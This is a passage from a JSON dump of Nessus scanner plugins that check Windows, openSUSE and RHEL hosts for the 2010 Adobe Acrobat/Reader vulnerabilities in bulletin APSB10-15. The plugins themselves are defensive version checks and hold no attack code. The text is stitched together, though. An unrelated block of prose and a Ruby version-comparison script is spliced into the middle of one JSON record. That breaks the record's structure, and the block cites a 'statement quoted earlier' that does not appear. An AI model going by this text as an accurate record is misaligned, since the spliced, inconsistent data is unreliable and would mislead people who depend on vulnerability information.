Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-1285)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-1295)\n\n - A memory corruption vulnerability could lead to code\n execution. This issue is reportedly being exploited in\n the wild. (CVE-2010-1297)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-2168)\n\n - Handling of an invalid pointer could lead to code\n execution. (CVE-2010-2201)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2202)\n\n - A denial of service vulnerability could potentially lead\n to code execution. (CVE-2010-2204)\n\n - It may be possible to execute arbitrary code via \n uninitialized memory locations. (CVE-2010-2205)\n\n - An error in array-indexing could lead to code \n execution. (CVE-2010-2206)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2207)\n \n - Dereferencing a deleted heap object could lead to code\n execution. (CVE-2010-2208)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2209)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2210)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2211)\n\n - A memory corruption vulnerability could lead to code\n execution. 
(CVE-2010-2212)\");\n\n script_set_attribute(attribute:'see_also',value:'http://www.adobe.com/support/security/bulletins/apsb10-15.html');\n script_set_attribute(attribute:'solution',value:'Upgrade to Adobe Acrobat 9.3.3 / 8.2.3 or later.');\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_dependencies('adobe_acrobat_installed.nasl');\n script_require_keys('SMB/Acrobat/Version');\n exit(0);\n}\n\n\ninclude('global_settings.inc');\n\nversion = 
get_kb_item('SMB/Acrobat/Version');\nif (isnull(version)) exit(1, \"The 'SMB/Acrobat/Version' KB item is missing.\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif ( \n ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 3) ||\n (ver[0] == 9 && ver[1] < 3) ||\n (ver[0] == 9 && ver[1] == 3 && ver[2] < 3)\n)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item('SMB/Acrobat/Path');\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n Product : Adobe Acrobat'+\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 9.3.3 / 8.2.3\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n}\nelse exit(0, \"The host is not affected since Adobe Acrobat \"+version_report+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:00", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).", "edition": 24, "published": "2010-07-09T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], 
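Both Nessus checks above (47165 for Reader, 47164 for Acrobat) reduce APSB10-15 to one branch-aware comparison: any major before 8 is affected, 8.x below 8.2.3 and 9.x below 9.3.3 are affected, anything else is not flagged. The Ruby below is an added example for this page, not Tenable's plugin code: it reimplements that decision over a constructed inventory of installs (the paths and version strings are made up for the example) and shows why the comparison has to be numeric rather than a string compare. Note, from Adobe's statement quoted earlier on this page, that 8.x is not affected by CVE-2010-1297 itself; an 8.2.2 hit is an APSB10-15 finding, not the authplay.dll zero-day.

```ruby
# Added example for this page (not Tenable's code): the APSB10-15 "affected"
# decision from the two Nessus plugins, applied to an inventory of installs.
FIXED = { 8 => [8, 2, 3], 9 => [9, 3, 3] }.freeze   # fixed builds per branch

# "9.3.3", "9.3.3-2.1", "9.3" -> [major, minor, patch, ...] as integers.
def parse_version(str)
  parts = str.to_s.scan(/\d+/).map(&:to_i)
  raise ArgumentError, "unparseable version #{str.inspect}" if parts.empty?
  parts += [0] * (3 - parts.size) if parts.size < 3   # pad "9.3" to 9.3.0
  parts
end

# Same logic as the plugins: pre-8 is affected, 8.x below 8.2.3 and 9.x below
# 9.3.3 are affected, later majors are not flagged by this bulletin.
# The comparison is element-wise on integers, never on the raw string.
def vulnerable?(version)
  v = parse_version(version)
  return true if v[0] < 8
  fixed = FIXED[v[0]]
  return false unless fixed
  (v[0, 3] <=> fixed) == -1
end

# Fixed build to report for an install; pre-8 installs have no in-branch fix,
# so they are pointed at the 9.x build.
def fixed_version_for(version)
  major = parse_version(version)[0]
  (FIXED[major] || FIXED[9]).join('.')
end

# Constructed inventory: [install path, version as the registry reports it].
# Paths are illustrative; they are not read from any host.
SAMPLE_INSTALLS = [
  ['C:\Program Files\Adobe\Reader 9.0\Reader', '9.3.2'],   # affected
  ['C:\Program Files\Adobe\Reader 9.0\Reader', '9.3.3'],   # fixed
  ['C:\Program Files\Adobe\Reader 8.0\Reader', '8.2.2'],   # below 8.2.3
  ['C:\Program Files\Adobe\Reader 9.0\Reader', '9.10.0'],  # string compare would wrongly flag this
  ['/opt/Adobe/Reader9', '9.3.3-2.1'],                     # distro-packaged build, fixed
  ['/usr/lib/acroread', '7.1.4']                           # pre-8, affected
].freeze

# One entry per affected install, in the plugins' report layout.
def report(installs)
  installs.select { |_path, ver| vulnerable?(ver) }.map do |path, ver|
    "Path : #{path}\n  Installed version : #{ver}\n  Fixed version : #{fixed_version_for(ver)}"
  end
end

if __FILE__ == $PROGRAM_NAME
  puts report(SAMPLE_INSTALLS)
end
```

The '9.10.0' row is the reason the plugins split the version into integers: as strings, '9.10.0' sorts before '9.3.3' and a naive compare would report a fixed install as vulnerable.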
"modified": "2010-07-09T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-cmaps", "p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW"], "id": "SUSE_11_0_ACROREAD-100708.NASL", "href": "https://www.tenable.com/plugins/nessus/47690", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-2664.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47690);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)\");\n script_summary(english:\"Check for the acroread-2664 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-07/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-9.3.3-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-cmaps-9.3.3-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-ja-9.3.3-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-ko-9.3.3-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-zh_CN-9.3.3-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-zh_TW-9.3.3-2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:59", "description": "Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise\nLinux 5 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security pages APSA10-01 and\nAPSB10-15, listed in the References section. A specially crafted PDF\nfile could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2010-1240, CVE-2010-1285, CVE-2010-1295, CVE-2010-1297,\nCVE-2010-2168, CVE-2010-2201, CVE-2010-2202, CVE-2010-2203,\nCVE-2010-2204, CVE-2010-2205, CVE-2010-2206, CVE-2010-2207,\nCVE-2010-2208, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211,\nCVE-2010-2212)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.3.3, which is not vulnerable to these\nissues. 
All running instances of Adobe Reader must be restarted for\nthe update to take effect.", "edition": 28, "published": "2010-07-28T00:00:00", "title": "RHEL 4 / 5 : acroread (RHSA-2010:0503)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-07-28T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:4.8", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:acroread-plugin", "p-cpe:/a:redhat:enterprise_linux:acroread"], "id": "REDHAT-RHSA-2010-0503.NASL", "href": "https://www.tenable.com/plugins/nessus/47869", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0503. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47869);\n script_version(\"1.52\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n script_bugtraq_id(40586, 41230, 41231, 41232, 41234, 41235, 41236, 41237, 41238, 41239, 41240, 41241, 41242, 41243, 41244, 41245);\n script_xref(name:\"RHSA\", value:\"2010:0503\");\n\n script_name(english:\"RHEL 4 / 5 : acroread (RHSA-2010:0503)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise\nLinux 5 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security pages APSA10-01 and\nAPSB10-15, listed in the References section. 
A specially crafted PDF\nfile could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2010-1240, CVE-2010-1285, CVE-2010-1295, CVE-2010-1297,\nCVE-2010-2168, CVE-2010-2201, CVE-2010-2202, CVE-2010-2203,\nCVE-2010-2204, CVE-2010-2205, CVE-2010-2206, CVE-2010-2207,\nCVE-2010-2208, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211,\nCVE-2010-2212)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.3.3, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1295\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1297\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2201\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2202\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2204\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2205\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2206\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2208\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2212\"\n );\n # http://www.adobe.com/support/security/advisories/apsa10-01.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/advisories/apsa10-01.html\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-15.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-15.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0503\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0503\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-9.3.3-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-9.3.3-2.el4\")) flag++;\n\n\n if 
(rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-9.3.3-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-9.3.3-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:07", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).", "edition": 24, "published": "2010-07-09T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-07-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-cmaps", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW"], "id": "SUSE_11_1_ACROREAD-100708.NASL", "href": "https://www.tenable.com/plugins/nessus/47692", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, 
